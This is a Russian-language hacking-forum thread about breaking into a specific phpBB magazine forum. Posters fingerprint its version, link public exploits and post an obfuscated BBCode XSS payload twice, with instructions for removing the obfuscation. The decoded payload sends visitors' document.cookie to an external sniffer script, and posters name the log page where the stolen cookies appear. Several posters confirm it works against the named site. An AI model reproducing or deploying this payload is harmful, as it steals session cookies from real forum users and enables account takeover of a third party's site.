Форумы Подскажите версию phpBB http://www.onboardmagazine.ru/forum/

Хотел спросить какая это весия phpBB?
http://www.onboardmagazine.ru/forum/
И если под эту версию эксплоит?Заранее всем спасибо

 

Предположу, что версия 2.0.19
А так, читай этот топ - http://forum.antichat.ru/thread18918.html
Потом, как определишь примерную версию лезишь сюда - http://forum.antichat.ru/thread12610.html
И будет тебе счастье...

 

А highlight баг случайно не в версии 2.0.19?

 

Вот тебе сплойты под версию 2.0.19

_http://milw0rm.com/exploits/1457
_http://milw0rm.com/exploits/1469
_http://milw0rm.com/exploits/1661

Также глянь тут

 

Версия этого форума 2.0.18
В это версии есть XSS

PHP:

[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"&#40")

Потом иди на снифер античата и лови куки

 

Коллега, Вы правы )
Проверил эту xss, работает, значит версия не выше 2.0.18...
Так что дерзай, автор топика...

 

чтото у меня хсска не прокатила((
p.s плюсы убрал
мож что еще надо сделать???

 

Все работает...еще раз только что проверил...
Вводишь с тексте сообщения

Code:

[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]  

Не забываем убирать плюсы и звездочки...
Заходишь сюда затем - http://antichat.ru/sniff/log.php
Как доказательство того, что работает:

Если опять не получится стучи в асю...помогу...
Ах да...забыл еще сказать...наврядли у тебя получится заполучить куки админа потому как наврядли он вовсе свой форум посещает...
Форум запустили...там рекламы больше чем обычных постов...

 

ооо всё прокатило.
оказывается надобыло через експлорер зайти..
а через оперу не катит

 

_http://www.onboardmagazine.ru/forum/docs/INSTALL.html